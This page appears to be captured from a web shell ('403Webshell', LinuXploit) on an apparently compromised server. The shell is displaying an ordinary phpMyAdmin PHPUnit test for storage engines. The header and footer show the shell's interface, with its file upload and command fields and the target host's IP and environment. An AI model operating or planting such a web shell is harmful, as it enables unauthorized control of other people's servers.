403Webshell
Server IP : 3.96.16.70  /  Your IP : 216.73.216.15
Web Server : Apache
System : Linux ip-172-31-26-103.ca-central-1.compute.internal 6.1.163-186.299.amzn2023.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Feb 24 16:35:42 UTC 2026 x86_64
User : ec2-user ( 1000)
PHP Version : 8.4.18
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/html/prod1.wondermakr.com/phpmyadmin/test/classes/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/prod1.wondermakr.com/phpmyadmin/test/classes/StorageEngineTest.php
<?php

declare(strict_types=1);

namespace PhpMyAdmin\Tests;

use PhpMyAdmin\Cache;
use PhpMyAdmin\Engines\Bdb;
use PhpMyAdmin\Engines\Berkeleydb;
use PhpMyAdmin\Engines\Binlog;
use PhpMyAdmin\Engines\Innobase;
use PhpMyAdmin\Engines\Innodb;
use PhpMyAdmin\Engines\Memory;
use PhpMyAdmin\Engines\Merge;
use PhpMyAdmin\Engines\MrgMyisam;
use PhpMyAdmin\Engines\Myisam;
use PhpMyAdmin\Engines\Ndbcluster;
use PhpMyAdmin\Engines\Pbxt;
use PhpMyAdmin\Engines\PerformanceSchema;
use PhpMyAdmin\StorageEngine;
use PHPUnit\Framework\MockObject\MockObject;

use function json_encode;

/**
 * @covers \PhpMyAdmin\StorageEngine
 */
class StorageEngineTest extends AbstractTestCase
{
    /** @var StorageEngine|MockObject */
    protected $object;

    /**
     * Sets up the fixture, for example, opens a network connection.
     * This method is called before a test is executed.
     */
    protected function setUp(): void
    {
        parent::setUp();
        $GLOBALS['server'] = 1;
        $this->object = $this->getMockForAbstractClass(
            StorageEngine::class,
            ['dummy']
        );
    }

    /**
     * Tears down the fixture, for example, closes a network connection.
     * This method is called after a test is executed.
     */
    protected function tearDown(): void
    {
        parent::tearDown();
        unset($this->object);
    }

    /**
     * Test for getStorageEngines
     */
    public function testGetStorageEngines(): void
    {
        self::assertSame([
            'dummy' => [
                'Engine' => 'dummy',
                'Support' => 'YES',
                'Comment' => 'dummy comment',
            ],
            'dummy2' => [
                'Engine' => 'dummy2',
                'Support' => 'NO',
                'Comment' => 'dummy2 comment',
            ],
            'FEDERATED' => [
                'Engine' => 'FEDERATED',
                'Support' => 'NO',
                'Comment' => 'Federated MySQL storage engine',
            ],
            'Pbxt' => [
                'Engine' => 'Pbxt',
                'Support' => 'NO',
                'Comment' => 'Pbxt storage engine',
            ],
        ], $this->object->getStorageEngines());
    }

    public function testGetArray(): void
    {
        $actual = $this->object->getArray();

        self::assertSame([
            'dummy' => [
                'name' => 'dummy',
                'comment' => 'dummy comment',
                'is_default' => false,
            ],
        ], $actual);
    }

    /**
     * Test for StorageEngine::getEngine
     *
     * @param string $expectedClass Class that should be selected
     * @param string $engineName    Engine name
     * @psalm-param class-string $expectedClass
     *
     * @dataProvider providerGetEngine
     */
    public function testGetEngine(string $expectedClass, string $engineName): void
    {
        $actual = StorageEngine::getEngine($engineName);
        self::assertInstanceOf($expectedClass, $actual);
    }

    /**
     * Provider for testGetEngine
     *
     * @return array
     */
    public static function providerGetEngine(): array
    {
        return [
            [
                StorageEngine::class,
                'unknown engine',
            ],
            [
                Bdb::class,
                'Bdb',
            ],
            [
                Berkeleydb::class,
                'Berkeleydb',
            ],
            [
                Binlog::class,
                'Binlog',
            ],
            [
                Innobase::class,
                'Innobase',
            ],
            [
                Innodb::class,
                'Innodb',
            ],
            [
                Memory::class,
                'Memory',
            ],
            [
                Merge::class,
                'Merge',
            ],
            [
                MrgMyisam::class,
                'Mrg_Myisam',
            ],
            [
                Myisam::class,
                'Myisam',
            ],
            [
                Ndbcluster::class,
                'Ndbcluster',
            ],
            [
                Pbxt::class,
                'Pbxt',
            ],
            [
                PerformanceSchema::class,
                'Performance_Schema',
            ],
        ];
    }

    /**
     * Test for isValid
     */
    public function testIsValid(): void
    {
        self::assertTrue($this->object->isValid('PBMS'));
        self::assertTrue($this->object->isValid('dummy'));
        self::assertTrue($this->object->isValid('dummy2'));
        self::assertFalse($this->object->isValid('invalid'));
    }

    /**
     * Test for getPage
     */
    public function testGetPage(): void
    {
        self::assertSame('', $this->object->getPage('Foo'));
    }

    /**
     * Test for getInfoPages
     */
    public function testGetInfoPages(): void
    {
        self::assertSame([], $this->object->getInfoPages());
    }

    /**
     * Test for getVariablesLikePattern
     */
    public function testGetVariablesLikePattern(): void
    {
        self::assertSame('', $this->object->getVariablesLikePattern());
    }

    /**
     * Test for getMysqlHelpPage
     */
    public function testGetMysqlHelpPage(): void
    {
        self::assertSame('dummy-storage-engine', $this->object->getMysqlHelpPage());
    }

    /**
     * Test for getVariables
     */
    public function testGetVariables(): void
    {
        self::assertSame([], $this->object->getVariables());
    }

    /**
     * Test for getSupportInformationMessage
     */
    public function testGetSupportInformationMessage(): void
    {
        self::assertSame('dummy is available on this MySQL server.', $this->object->getSupportInformationMessage());

        $this->object->support = 1;
        self::assertSame(
            'dummy has been disabled for this MySQL server.',
            $this->object->getSupportInformationMessage()
        );

        $this->object->support = 2;
        self::assertSame('dummy is available on this MySQL server.', $this->object->getSupportInformationMessage());

        $this->object->support = 3;
        self::assertSame(
            'dummy is the default storage engine on this MySQL server.',
            $this->object->getSupportInformationMessage()
        );
    }

    /**
     * Test for getComment
     */
    public function testGetComment(): void
    {
        self::assertSame('dummy comment', $this->object->getComment());
    }

    /**
     * Test for getTitle
     */
    public function testGetTitle(): void
    {
        self::assertSame('dummy', $this->object->getTitle());
    }

    /**
     * Test for resolveTypeSize
     */
    public function testResolveTypeSize(): void
    {
        self::assertEquals([
            0 => 12,
            1 => 'B',
        ], $this->object->resolveTypeSize(12));
    }

    public function testHasMroongaEngine(): void
    {
        $this->dummyDbi->addResult('SELECT mroonga_command(\'object_list\');', [
            [
                (string) json_encode([]), // Fake result
            ],
        ]);
        self::assertTrue(StorageEngine::hasMroongaEngine());
        self::assertTrue(StorageEngine::hasMroongaEngine()); // Does not call any query

        Cache::remove('storage-engine.mroonga.has.mroonga_command'); // Cache clear

        $this->dummyDbi->addResult('SELECT mroonga_command(\'object_list\');', false);
        self::assertFalse(StorageEngine::hasMroongaEngine());

        $this->assertAllQueriesConsumed();
    }

    public function testGetMroongaLengths(): void
    {
        $this->dummyDbi->addResult('SELECT mroonga_command(\'object_list\');', [
            [
                // Partial
                (string) json_encode([
                    'WGS84GeoPoint' => [
                        'id' => 18,
                        'name' => 'WGS84GeoPoint',
                        'opened' => true,
                        'n_elements' => 4,
                        'type' => [
                            'id' => 32,
                            'name' => 'type',
                        ],
                        'flags' => [
                            'value' => 24,
                            'names' => 'KEY_GEO_POINT',
                        ],
                        'path' => null,
                        'size' => 8,
                    ],
                    'mroonga_operations' => [
                        'type' => [
                            'id' => 51,
                            'name' => 'table:no_key',
                        ],
                    ],
                    'mroonga_operations.type' => [
                        'type' => [
                            'id' => 65,
                            'name' => 'column:var_size',
                        ],
                    ],
                    'mroonga_operations.table' => [
                        'type' => [
                            'id' => 65,
                            'name' => 'column:var_size',
                        ],
                    ],
                    'mroonga_operations.record' => [
                        'type' => [
                            'id' => 64,
                            'name' => 'column:fix_size',
                        ],
                    ],
                    'idx_correo' => [
                        'type' => [
                            'id' => 49,
                            'name' => 'table:pat_key',
                        ],
                    ],
                    'idx_correo.id' => [
                        'type' => [
                            'id' => 64,
                            'name' => 'column:fix_size',
                        ],
                    ],
                    'idx_correo.search' => [
                        'type' => [
                            'id' => 65,
                            'name' => 'column:var_size',
                        ],
                    ],
                    'idx_correo#idx_correo_search' => [
                        'type' => [
                            'id' => 49,
                            'name' => 'table:pat_key',
                        ],
                    ],
                    'idx_correo#idx_correo_search.index' => [
                        'type' => [
                            'id' => 72,
                            'name' => 'column:index',
                        ],
                    ],
                ]),
            ],
        ]);
        $this->dummyDbi->addResult('SELECT mroonga_command(\'object_inspect idx_correo\');', [
            [
                // Partial
                (string) json_encode([
                    'id' => 265,
                    'name' => 'idx_correo',
                    'type' => [
                        'id' => 49,
                        'name' => 'table:pat_key',
                    ],
                    'key' => [
                        'type' => [
                            'id' => 8,
                            'name' => 'Int32',
                            'type' => [
                                'id' => 32,
                                'name' => 'type',
                            ],
                            'size' => 4,
                        ],
                        'total_size' => 0,
                        'max_total_size' => 4294967294,
                    ],
                    'value' => ['type' => null],
                    'n_records' => 0,
                    'disk_usage' => 4243456,
                ]),
            ],
        ]);
        $this->dummyDbi->addResult('SELECT mroonga_command(\'object_inspect idx_correo.id\');', [
            [
                // Full object
                (string) json_encode([
                    'id' => 266,
                    'name' => 'id',
                    'table' => [
                        'id' => 265,
                        'name' => 'idx_correo',
                        'type' => [
                            'id' => 49,
                            'name' => 'table:pat_key',
                        ],
                        'key' => [
                            'type' => [
                                'id' => 8,
                                'name' => 'Int32',
                                'type' => [
                                    'id' => 32,
                                    'name' => 'type',
                                ],
                                'size' => 4,
                            ],
                            'total_size' => 0,
                            'max_total_size' => 4294967294,
                        ],
                        'value' => ['type' => null],
                        'n_records' => 0,
                        'disk_usage' => 4243456,
                    ],
                    'full_name' => 'idx_correo.id',
                    'type' => [
                        'name' => 'scalar',
                        'raw' => [
                            'id' => 64,
                            'name' => 'column:fix_size',
                        ],
                    ],
                    'value' => [
                        'type' => [
                            'id' => 8,
                            'name' => 'Int32',
                            'type' => [
                                'id' => 32,
                                'name' => 'type',
                            ],
                            'size' => 4,
                        ],
                        'compress' => null,
                    ],
                    'disk_usage' => 4096,
                ]),
            ],
        ]);
        $this->dummyDbi->addResult('SELECT mroonga_command(\'object_inspect idx_correo.search\');', [
            [
                // Full object
                (string) json_encode([
                    'id' => 267,
                    'name' => 'search',
                    'table' => [
                        'id' => 265,
                        'name' => 'idx_correo',
                        'type' => [
                            'id' => 49,
                            'name' => 'table:pat_key',
                        ],
                        'key' => [
                            'type' => [
                                'id' => 8,
                                'name' => 'Int32',
                                'type' => [
                                    'id' => 32,
                                    'name' => 'type',
                                ],
                                'size' => 4,
                            ],
                            'total_size' => 0,
                            'max_total_size' => 4294967294,
                        ],
                        'value' => ['type' => null],
                        'n_records' => 0,
                        'disk_usage' => 4243456,
                    ],
                    'full_name' => 'idx_correo.search',
                    'type' => [
                        'name' => 'scalar',
                        'raw' => [
                            'id' => 65,
                            'name' => 'column:var_size',
                        ],
                    ],
                    'value' => [
                        'type' => [
                            'id' => 16,
                            'name' => 'LongText',
                            'type' => [
                                'id' => 32,
                                'name' => 'type',
                            ],
                            'size' => 2147483648,
                        ],
                        'compress' => null,
                    ],
                    'disk_usage' => 274432,
                ]),
            ],
        ]);
        $this->dummyDbi->addResult('SELECT mroonga_command(\'object_inspect idx_correo#idx_correo_search\');', [
            [
                // Partial
                (string) json_encode([
                    'id' => 268,
                    'name' => 'idx_correo#idx_correo_search',
                    'type' => [
                        'id' => 49,
                        'name' => 'table:pat_key',
                    ],
                    'key' => [
                        'type' => [
                            'id' => 14,
                            'name' => 'ShortText',
                            'type' => [
                                'id' => 32,
                                'name' => 'type',
                            ],
                            'size' => 4096,
                        ],
                        'total_size' => 0,
                        'max_total_size' => 4294967294,
                    ],
                    'value' => ['type' => null],
                    'n_records' => 0,
                    'disk_usage' => 12878,
                ]),
            ],
        ]);
        $this->dummyDbi->addResult('SELECT mroonga_command(\'object_inspect idx_correo#idx_correo_search.index\');', [
            [
                // Full object
                (string) json_encode([
                    'id' => 269,
                    'name' => 'index',
                    'table' => [
                        'id' => 268,
                        'name' => 'idx_correo#idx_correo_search',
                        'type' => [
                            'id' => 49,
                            'name' => 'table:pat_key',
                        ],
                        'key' => [
                            'type' => [
                                'id' => 14,
                                'name' => 'ShortText',
                                'type' => [
                                    'id' => 32,
                                    'name' => 'type',
                                ],
                                'size' => 4096,
                            ],
                            'total_size' => 0,
                            'max_total_size' => 4294967294,
                        ],
                        'value' => ['type' => null],
                        'n_records' => 0,
                        'disk_usage' => 4243456,
                    ],
                    'full_name' => 'idx_correo#idx_correo_search.index',
                    'type' => [
                        'name' => 'index',
                        'raw' => [
                            'id' => 72,
                            'name' => 'column:index',
                        ],
                    ],
                    'value' => [
                        'type' => [
                            'id' => 265,
                            'name' => 'idx_correo',
                            'type' => [
                                'id' => 49,
                                'name' => 'table:pat_key',
                            ],
                            'size' => 4,
                        ],
                        'section' => false,
                        'weight' => false,
                        'position' => true,
                        'size' => 'normal',
                        'statistics' => [
                            'max_section_id' => 0,
                            'n_garbage_segments' => 0,
                            'max_array_segment_id' => 0,
                            'n_array_segments' => 0,
                            'max_buffer_segment_id' => 0,
                            'n_buffer_segments' => 0,
                            'max_in_use_physical_segment_id' => 0,
                            'n_unmanaged_segments' => 0,
                            'total_chunk_size' => 0,
                            'max_in_use_chunk_id' => 0,
                            'n_garbage_chunks' => [
                                0 => 0,
                                1 => 0,
                                2 => 0,
                                3 => 0,
                                4 => 0,
                                5 => 0,
                                6 => 0,
                                7 => 0,
                                8 => 0,
                                9 => 0,
                                10 => 0,
                                11 => 0,
                                12 => 0,
                                13 => 0,
                                14 => 0,
                            ],
                        ],
                    ],
                    'sources' => [
                        0 => [
                            'id' => 267,
                            'name' => 'search',
                            'table' => [
                                'id' => 265,
                                'name' => 'idx_correo',
                                'type' => [
                                    'id' => 49,
                                    'name' => 'table:pat_key',
                                ],
                                'key' => [
                                    'type' => [
                                        'id' => 8,
                                        'name' => 'Int32',
                                        'type' => [
                                            'id' => 32,
                                            'name' => 'type',
                                        ],
                                        'size' => 4,
                                    ],
                                    'total_size' => 0,
                                    'max_total_size' => 4294967294,
                                ],
                                'value' => ['type' => null],
                                'n_records' => 0,
                                'disk_usage' => 4243456,
                            ],
                            'full_name' => 'idx_correo.search',
                        ],
                    ],
                    'disk_usage' => 565248,
                ]),
            ],
        ]);

        $this->dummyDbi->addSelectDb('my_db');
        $lengths = StorageEngine::getMroongaLengths('my_db', 'idx_correo');
        $this->assertAllSelectsConsumed();
        self::assertSame([4521984, 578126], $lengths);

        $this->assertAllQueriesConsumed();
    }
}

Youez - 2016 - github.com/yon3zu
LinuXploit